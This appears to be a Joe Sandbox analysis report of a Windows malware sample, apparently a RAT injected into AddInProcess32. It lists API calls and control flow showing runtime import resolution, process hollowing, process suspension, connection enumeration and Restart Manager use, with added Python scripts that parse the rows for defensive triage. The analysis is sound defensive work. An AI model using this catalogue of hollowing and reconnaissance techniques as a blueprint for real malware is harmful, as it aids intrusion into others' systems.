                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                  • String ID: Unknown exception
                                                                                                  • API String ID: 3476068407-410509341
                                                                                                  • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                  • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                  • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                  • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:1.1%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:2.3%
                                                                                                  Total number of Nodes:517
                                                                                                  Total number of Limit Nodes:8
                                                                                                  execution_graph: [rendered graph not recoverable as text; the page carried only a flattened node/edge listing of node ids, code addresses (e.g. 404e26, 434918, 40ea00) and the Windows API calls at each node (WaitForSingleObject, SetEvent, CloseHandle, closesocket, CreateThread, LoadLibraryA, GetProcAddress, GetModuleFileNameW, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, CreateProcessA, CreateMutexA, DeleteFileW, Sleep, IsDebuggerPresent, SetUnhandledExceptionFilter, FindResourceA, LoadResource, LockResource, SizeofResource, RtlAllocateHeap, among others)]
44062d 20 API calls _free 47072->47088 47073 4461e1 RtlAllocateHeap 47075 4461f4 47073->47075 47073->47077 47075->46900 47077->47072 47077->47073 47087 443001 7 API calls 2 library calls 47077->47087 47079 4020bf 47078->47079 47089 4023ce 47079->47089 47081 4020ca 47093 40250a 47081->47093 47083 4020d9 47083->46903 47085 4020b7 28 API calls 47084->47085 47086 406e27 47085->47086 47086->46910 47087->47077 47088->47075 47090 402428 47089->47090 47091 4023d8 47089->47091 47090->47081 47091->47090 47100 4027a7 11 API calls std::_Deallocate 47091->47100 47094 40251a 47093->47094 47095 402520 47094->47095 47096 402535 47094->47096 47101 402569 47095->47101 47111 4028e8 28 API calls 47096->47111 47099 402533 47099->47083 47100->47090 47112 402888 47101->47112 47103 40257d 47104 402592 47103->47104 47105 4025a7 47103->47105 47117 402a34 22 API calls 47104->47117 47119 4028e8 28 API calls 47105->47119 47108 40259b 47118 4029da 22 API calls 47108->47118 47110 4025a5 47110->47099 47111->47099 47113 402890 47112->47113 47114 402898 47113->47114 47120 402ca3 22 API calls 47113->47120 47114->47103 47117->47108 47118->47110 47119->47110 47122 4020e7 47121->47122 47123 4023ce 11 API calls 47122->47123 47124 4020f2 47123->47124 47124->46938 47125->46938 47126->46938 47127->46927 47128->46919 47129->46942 47130->46947 47131->46945 47132->46955 47133->46955 47143 412829 61 API calls 47140->47143 47145 443248 _Atexit 47144->47145 47146 443396 _Atexit GetModuleHandleW 47145->47146 47154 443260 47145->47154 47148 443254 47146->47148 47148->47154 47178 4433da GetModuleHandleExW 47148->47178 47149 443268 47153 4432dd 47149->47153 47163 443306 47149->47163 47186 443ff0 20 API calls _Atexit 47149->47186 47157 4432f5 47153->47157 47187 444276 5 API calls ___crtLCMapStringA 47153->47187 47166 445909 EnterCriticalSection 47154->47166 47155 443323 47170 443355 47155->47170 47156 44334f 47189 4577a9 5 API calls ___crtLCMapStringA 47156->47189 47188 444276 5 API calls ___crtLCMapStringA 
47157->47188 47167 443346 47163->47167 47166->47149 47190 445951 LeaveCriticalSection 47167->47190 47169 44331f 47169->47155 47169->47156 47191 448d49 47170->47191 47173 443383 47176 4433da _Atexit 8 API calls 47173->47176 47174 443363 GetPEB 47174->47173 47175 443373 GetCurrentProcess TerminateProcess 47174->47175 47175->47173 47177 44338b ExitProcess 47176->47177 47179 443404 GetProcAddress 47178->47179 47180 443427 47178->47180 47183 443419 47179->47183 47181 443436 47180->47181 47182 44342d FreeLibrary 47180->47182 47184 43502b ___crtLCMapStringA 5 API calls 47181->47184 47182->47181 47183->47180 47185 443440 47184->47185 47185->47154 47186->47153 47187->47157 47188->47163 47190->47169 47192 448d64 47191->47192 47193 448d6e 47191->47193 47195 43502b ___crtLCMapStringA 5 API calls 47192->47195 47197 44854a 47193->47197 47196 44335f 47195->47196 47196->47173 47196->47174 47198 44857a 47197->47198 47201 448576 47197->47201 47198->47192 47199 44859a 47199->47198 47202 4485a6 GetProcAddress 47199->47202 47201->47198 47201->47199 47204 4485e6 47201->47204 47203 4485b6 __crt_fast_encode_pointer 47202->47203 47203->47198 47205 448607 LoadLibraryExW 47204->47205 47210 4485fc 47204->47210 47206 448624 GetLastError 47205->47206 47207 44863c 47205->47207 47206->47207 47208 44862f LoadLibraryExW 47206->47208 47209 448653 FreeLibrary 47207->47209 47207->47210 47208->47207 47209->47210 47210->47201

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                                                  • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                                                  • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                                                  • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                                                  • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                                                  • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                                                                                  • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                                                                                  • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                                                                                  • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                  • API String ID: 4236061018-3687161714
                                                                                                  • Opcode ID: 5fded5d77b72a202610b087cc82529c2f7d7b10a8ab2824fd38dfad8e3bd9f71
                                                                                                  • Instruction ID: 9b463eec3a0437fb1f175c53e93b0f4db36c95b88d1cb607187732a7b05a7934
                                                                                                  • Opcode Fuzzy Hash: 5fded5d77b72a202610b087cc82529c2f7d7b10a8ab2824fd38dfad8e3bd9f71
                                                                                                  • Instruction Fuzzy Hash: E2418BA0E8035879DB207BB65D89E3B3E5CD9857953614837B44C93550EBBCEC408EAE
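The rows above record a resolver that fetches every import by name at run time (LoadLibraryA or GetModuleHandleA, then GetProcAddress), so the static import table of the injected image says nothing about its capabilities. The script below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses rows in the report's own format, groups the (DLL, symbol) pairs and tags the ones worth triaging first. Two assumptions are built in. First, Joe Sandbox prints the real argument (the DLL name) followed by the next stack slots; in this function the next slot holds the name the following GetProcAddress receives, so the parser reads it as the symbol, and treats a bare 8-hex-digit slot (the Shlwapi row) as an ordinal. Second, the capability tags are this example's triage heuristics, not report content.

```python
"""Added example, not part of the Joe Sandbox report or of the analysed sample:
parse the 'APIs' rows of a function that resolves imports at run time and group
the (DLL, symbol) pairs for triage. Capability tags are this example's own
heuristics."""
import re
from collections import defaultdict

# Constructed input: a subset of the rows shown above for the function at 0x41CBF6,
# copied from the report. The second argument column is the adjacent stack slot,
# which here is the name passed to the GetProcAddress call that follows.
SAMPLE_API_ROWS = """
• LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
• GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
• GetProcAddress.KERNEL32(00000000), ref: 0041CC19
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
• GetProcAddress.KERNEL32(00000000), ref: 0041CC57
• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
• GetProcAddress.KERNEL32(00000000), ref: 0041CC66
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
• GetProcAddress.KERNEL32(00000000), ref: 0041CD17
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
• GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
• LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
• GetProcAddress.KERNEL32(00000000), ref: 0041CD60
• LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
• GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
"""

ROW = re.compile(
    r"^\s*•\s*(?P<loader>LoadLibraryA|GetModuleHandleA)\.\w+\("
    r"(?P<module>[^,()]+),(?P<slot>[^,()]+),.*?ref:\s*(?P<ref>[0-9A-Fa-f]+)",
    re.MULTILINE,
)
ORDINAL = re.compile(r"[0-9A-F]{8}")  # a bare 8-hex-digit slot is an ordinal, not a name

# Triage heuristics (this example's assumptions, not report content): which resolved
# symbols an analyst looks at first.
TRIAGE_TAGS = {
    "process_hollowing": {"NtUnmapViewOfSection"},
    "process_control": {"NtSuspendProcess", "NtResumeProcess", "NtQueryInformationProcess"},
    "host_fingerprint": {"GlobalMemoryStatusEx", "IsWow64Process", "GetSystemTimes", "GetComputerNameExW"},
    "connection_enum": {"GetExtendedTcpTable", "GetExtendedUdpTable"},
    "restart_manager": {"RmStartSession", "RmRegisterResources", "RmGetList", "RmEndSession"},
    "display_enum": {"EnumDisplayDevicesW", "EnumDisplayMonitors", "GetMonitorInfoW"},
    "privilege_check": {"IsUserAnAdmin"},
}


def parse_api_rows(text):
    """Return one record per LoadLibraryA/GetModuleHandleA row: loader, module, symbol, ordinal, ref."""
    records = []
    for m in ROW.finditer(text):
        slot = m.group("slot").strip()
        ordinal = int(slot, 16) if ORDINAL.fullmatch(slot) else None
        records.append({
            "loader": m.group("loader"),  # LoadLibraryA maps the DLL; GetModuleHandleA needs it already mapped
            "module": m.group("module").strip().lower(),
            "symbol": f"ordinal#{ordinal}" if ordinal is not None else slot,
            "ordinal": ordinal,
            "ref": int(m.group("ref"), 16),
        })
    return records


def group_by_module(records):
    """Map each DLL to the symbols resolved from it, in resolution order."""
    grouped = defaultdict(list)
    for r in records:
        grouped[r["module"]].append(r["symbol"])
    return dict(grouped)


def newly_loaded_modules(records):
    """DLLs pulled in with LoadLibraryA: image loads the host process did not necessarily have before."""
    return sorted({r["module"] for r in records if r["loader"] == "LoadLibraryA"})


def triage(records):
    """Map each heuristic tag to the resolved symbols that trigger it (tags without hits are omitted)."""
    hits = {}
    for r in records:
        for tag, names in TRIAGE_TAGS.items():
            if r["symbol"] in names and r["symbol"] not in hits.setdefault(tag, []):
                hits[tag].append(r["symbol"])
    return hits
```

Two things the grouping makes visible that the flat list does not: the resolver first tries Psapi for GetProcessImageFileNameW and then Kernel32 (the export moved between Windows versions), and one Shlwapi symbol is fetched by ordinal 12 rather than by name, which any name-only string hunt misses. The LoadLibraryA set (Psapi, shcore, Iphlpapi, Rstrtmgr, Shlwapi, and Shell32 in the full table) is also the set of image loads a defender can expect from the hollowed host process, which in this report is AddInProcess32, for example as Sysmon Event ID 7 records.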

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,0044332B,00000000,0046E958,0000000C,00443482,00000000,00000002,00000000), ref: 00443376
                                                                                                  • TerminateProcess.KERNEL32(00000000,?,0044332B,00000000,0046E958,0000000C,00443482,00000000,00000002,00000000), ref: 0044337D
                                                                                                  • ExitProcess.KERNEL32 ref: 0044338F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                  • String ID:
                                                                                                  • API String ID: 1703294689-0
                                                                                                  • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                  • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                                                  • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                  • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474F08,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404E38
                                                                                                  • SetEvent.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404E43
                                                                                                  • CloseHandle.KERNELBASE(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404E4C
                                                                                                  • closesocket.WS2_32(?), ref: 00404E5A
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404E91
                                                                                                  • SetEvent.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404EA2
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404EA9
                                                                                                  • SetEvent.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404EBA
                                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404EBF
                                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404EC4
                                                                                                  • SetEvent.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404ED1
                                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404ED6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                  • String ID:
                                                                                                  • API String ID: 3658366068-0
                                                                                                  • Opcode ID: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                                                                                  • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                                  • Opcode Fuzzy Hash: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                                                                                  • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                                                                  Control-flow Graph

                                                                                                  Control-flow graph of 4485e6 (text export summarised): 4485e6-4485fa -> 448607-448622 LoadLibraryExW, or -> 4485fc-448605 -> 44865e-448660 (exit). After the first LoadLibraryExW: either -> 44864b-448651, or -> 448624-44862d GetLastError -> 44862f-44863a LoadLibraryExW (retry) or 44863c, both -> 44863e-448640 -> 44864b-448651 or 448642-448649. From 44864b-448651: -> 448653-448654 FreeLibrary -> 44865a, or -> 44865a directly; 44865a and 448642-448649 -> 44865c-44865d -> 44865e-448660 (exit).
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                                                  • GetLastError.KERNEL32(?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 3177248105-0
                                                                                                  • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                  • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                                                  • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                  • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
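The three rows above show the first LoadLibraryExW called with flags 0x800 (LOAD_LIBRARY_SEARCH_SYSTEM32), GetLastError inspected, and a second LoadLibraryExW with flags 0 issued only on that branch; together with the FlsSetValue argument and the 0x448xxx addresses shared with the other runtime helpers, this is consistent with the C runtime's own delay-load helper rather than payload logic, so the retry is a false lead for anyone hunting the RAT's loader. The script below is an added example, not part of the Joe Sandbox report or of the analysed sample. It parses the plain-text control_flow_graph export that accompanies each function (basic blocks as `ID start[-end] [call addr] [API ...]`, then `src->dst` edges), enumerates the API-call orderings the graph permits, and checks the property above: the second LoadLibraryExW is never reached without GetLastError in between. It assumes node numbers are at most four decimal digits and block addresses at least five hex digits, which is how the export distinguishes the two.

```python
"""Added example, not part of the Joe Sandbox report or of the analysed sample:
parse the plain-text 'control_flow_graph' export (blocks as 'ID start[-end]
[call addr] [API ...]', then 'src->dst' edges) and enumerate the API-call
orderings it permits."""
import re
from collections import defaultdict

# Constructed input, copied from the report: the graph of the function at 0x4485E6
# (two LoadLibraryExW calls, the second only after GetLastError) and the single-block
# graph of the function at 0x40D0A4 (CreateMutexA followed by GetLastError).
CFG_4485E6 = (
    "22 4485e6-4485fa 23 448607-448622 LoadLibraryExW 22->23 24 4485fc-448605 22->24 "
    "26 448624-44862d GetLastError 23->26 27 44864b-448651 23->27 25 44865e-448660 24->25 "
    "28 44863c 26->28 29 44862f-44863a LoadLibraryExW 26->29 30 448653-448654 FreeLibrary 27->30 "
    "31 44865a 27->31 32 44863e-448640 28->32 29->32 30->31 33 44865c-44865d 31->33 32->27 "
    "34 448642-448649 32->34 33->25 34->33"
)
CFG_40D0A4 = "35 40d0a4-40d0d0 call 401fab CreateMutexA GetLastError"

NODE_ID = re.compile(r"\d{1,4}")                      # node numbers are small decimals (assumption)
ADDR = re.compile(r"[0-9a-f]{5,}(?:-[0-9a-f]{5,})?")  # block address or address range (assumption)
EDGE = re.compile(r"(\d+)->(\d+)")


def parse_cfg(text):
    """Return ({node_id: {start, end, calls, apis}}, [(src, dst), ...]) in export order."""
    nodes, edges, cur = {}, [], None
    toks = text.split()
    i = 0
    while i < len(toks):
        tok = toks[i]
        edge = EDGE.fullmatch(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
        elif NODE_ID.fullmatch(tok) and i + 1 < len(toks) and ADDR.fullmatch(toks[i + 1]):
            start, _, end = toks[i + 1].partition("-")
            cur = nodes[int(tok)] = {"start": int(start, 16), "end": int(end or start, 16),
                                     "calls": [], "apis": []}
            i += 1                                    # consume the address token
        elif tok == "call" and cur is not None and i + 1 < len(toks):
            cur["calls"].append(int(toks[i + 1], 16))  # direct call to an internal function
            i += 1
        elif cur is not None:
            cur["apis"].append(tok)                   # imported API invoked from this block
        i += 1
    return nodes, edges


def api_sequences(nodes, edges, entry=None):
    """Distinct API-call orderings along every simple path from the entry block to a block without successors."""
    succ = defaultdict(list)
    for s, d in edges:
        succ[s].append(d)
    entry = next(iter(nodes)) if entry is None else entry  # first exported block is the entry
    seqs = set()

    def walk(n, on_path, seq):
        seq += tuple(nodes.get(n, {}).get("apis", ()))
        if not succ.get(n):
            seqs.add(seq)
            return
        for d in succ[n]:
            if d not in on_path:                      # simple paths only: back edges are not followed
                walk(d, on_path | {d}, seq)

    walk(entry, {entry}, ())
    return sorted(seqs)


def retry_is_guarded(seqs, api, guard):
    """True if every ordering that calls `api` twice calls `guard` between the two calls."""
    for seq in seqs:
        hits = [i for i, a in enumerate(seq) if a == api]
        if len(hits) >= 2 and guard not in seq[hits[0] + 1:hits[1]]:
            return False
    return True
```

Run on the 4485e6 graph, `api_sequences` yields seven orderings, the longest being LoadLibraryExW, GetLastError, LoadLibraryExW, FreeLibrary, and `retry_is_guarded` confirms that no ordering reaches the second LoadLibraryExW without GetLastError first. The same parser handles the one-block export of 40d0a4, where the `call 401fab` token is recorded as an internal callee rather than an API.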

                                                                                                  Control-flow Graph

                                                                                                  Control-flow graph of 40d0a4 (text export): one basic block, 40d0a4-40d0d0, which calls 401fab, then CreateMutexA, then GetLastError.
                                                                                                  APIs
                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                                                  • GetLastError.KERNEL32 ref: 0040D0BE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateErrorLastMutex
                                                                                                  • String ID: 0SG
                                                                                                  • API String ID: 1925916568-2718230054
                                                                                                  APIs
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004485AA
                                                                                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 2279764990-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00445B74: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000), ref: 00445BB5
                                                                                                  • _free.LIBCMT ref: 004501C0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 614378929-0
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000), ref: 00445BB5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
